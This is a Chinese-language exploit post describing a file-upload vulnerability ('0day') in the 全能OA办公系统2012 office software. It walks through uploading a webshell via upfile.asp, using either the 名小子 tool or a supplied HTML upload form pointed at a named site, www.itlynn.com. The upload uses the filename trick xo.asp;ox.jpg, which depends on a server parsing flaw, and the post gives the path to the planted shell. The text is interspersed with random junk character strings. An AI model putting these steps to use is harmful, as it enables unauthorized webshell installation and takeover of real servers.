全能OA办公系统0day OA办公系统漏洞 上传漏洞

admin

全能OA办公系统 上传漏洞
​
系统介绍：

1 q3 ?7 p+ f8 e8 s# O1 f/ y5 y( l全能OA办公系统2012是功能非常强大的OA系统，目前功能已完全能满足日常办公需要。

主要功能：
公司通告
5 a* S- }5 h# z$ K! }/ i% e工作计划
通讯助理
客户资源
我的公文
公文传阅
$ w- U5 x$ X' m公共资源
. ^1 k  J& e  s1 [9 ?2 R资源预约
今日考勤
' Y; V( A! c* t7 ?! ]个人计划
个人通讯录
& y* q7 b) a" H/ |个人基本档案
/ ^9 o2 H, v1 M5 A8 w" j未读邮件
4 ]# P# \9 w# ]发邮件
收件夹
寄件夹
; V5 Y! W: }) n( s% y" X网络硬盘
- v4 a  H) v( d; [  c2 x网络会议
网络调查
2 z# G& N/ o( s交流论坛
" c+ ?% P: g5 ~
) f! U% j' f7 k% `7 z! t9 F  b有兴趣测试的朋友可以下源码看看

源码下载：

  |; S0 v/ Z7 e$ P2 i8 g) zhttp://www.mycodes.net/30/4750.htm
1 H7 z. I& r) u  f# V# u1 F0 {
漏洞介绍：

7 |: D6 {& ^* A: m1 J由upfile.asp上传文件漏洞引起

5 T- ~$ q" g# J' L测试方法：
7 r4 E& z- c& X: r0 r  D
- P* `; W" ^* T9 v5 \5 A使用名小子上传http://www.itlynn.com/upfile.asp即可

8 p- R8 n6 t$ ]7 a. a( m! X+ G2 z, H0 n如果upfile.asp文件被删除不存在。

6 p2 f) @; n8 w9 f) W$ s  那么可以试着访问http://www.itlynn.com/upfile/upfile.asp 。

- f6 B' l. s7 I/ }1 ^如果存在那么将如下代码保存为upfile.html。
4 Q- o6 W0 n6 N# y2 c+ U
7 a3 _3 b+ V% X( e1 o! ~+ Q+ P然后将action的参数修改为目标站点的url。例如 http://www.itlynn.com/upfile/upfile.asp。
3 w5 n  k  `& b% i


; Z  }$ U9 k0 ^% U1 ?( e! k/ F01 <table border='0' align="center" cellpadding="5">
0 c3 Y" `: K" A
6 J! l  B% U4 G' y02 <form method="POST"action="http://www.itlynn.com/upfile/upfile.asp"enctype="multipart/form-data"id="form1"name="form1">

. R& C( Z6 u* q) K+ T' E03 <tr>

. T) M9 ^+ u$ t( |8 d+ W04             <td>报错：</td>

$ B1 h0 J9 e8 P5 y7 y' h+ l05             <td><input type='radio' name='errnumber' value='0'>

06               自动更名
2 o' H" t, z3 g8 g. c
* F$ M0 v2 x2 c7 X: [5 e07               <input type='radio' name='errnumber' value='1' checked>

08               报错方式
8 D6 G' S! \! v: X$ t
: i5 M$ x6 u0 q5 ]% ]- Y2 l) O0 {09               <input type='radio' name='errnumber' value='2'>

10               直接覆盖</td>
+ B, x. v" X+ R$ F
6 e! ^5 M; r7 k1 h* x0 Z  t. l) E11           </tr>
. K( J0 b& \" {5 y/ W0 R
6 o) n. \! X+ D+ J3 s% v* n12           <tr>
$ m4 o) |* q1 M, ~- j1 ^
13             <td>主题：</td>

0 ^/ X" v) Q5 {7 T' Q14             <td><input type='text' name='filename' size='30'></td>
, [- Z  E/ V' J% ~: ]2 `6 c
9 N: z/ Z1 ]( A3 x0 e8 X4 h+ ?/ S15           </tr>
! B6 e- l2 C9 F6 L
9 ?& X9 o3 D/ U+ A# S16           <tr>
& g6 W, O/ o6 U! J2 Z3 x$ E
17             <td>文件：</td>
" B) {$ b. y% |
; H2 ^" g+ _, E7 D6 }: b6 W& E9 b; a+ i18             <td><input type="file"name="fruit"size="30"></td>

19           </tr>

% {$ \9 x4 b3 u20           <tr>
% @5 \& q: U5 v2 _" a, F) e
! i) O: m/ ~0 }7 G7 z7 k3 @- g21             <td valign='top'>简介：</td>
' `+ ~- I: j& O- ?  t7 _8 O& p
* z' E# r% C" b# ~22             <td><textarea name='fileExt' cols='40' rows='5'></textarea></td>

/ ^3 e( q7 L2 Q# C7 j% P" w7 [5 t2 h23           </tr>

: o8 H* ]1 v5 r0 {9 y. v24   
8 B0 D- _8 O# M0 E# N* ?1 ^  C
3 K7 f3 I, a* \1 H, g! w4 y0 V25             <td colspan='2'><input type="submit" value="上传文件" name="subbutt"></td>

26           </tr>

27         </form>

然后打开上传一个文件名为xo.asp;ox.jpg的文件。
' K- ]- y  ~) _4 P
  T& O: ~4 f. Z: L$ ^

2 z9 t8 i) U7 A  f0 r5 [上传成功后，马的路径是：http://www.itlynn.com/upfile/savepath/xo.asp;ox.jpg

此漏洞需要配合解析漏洞利用。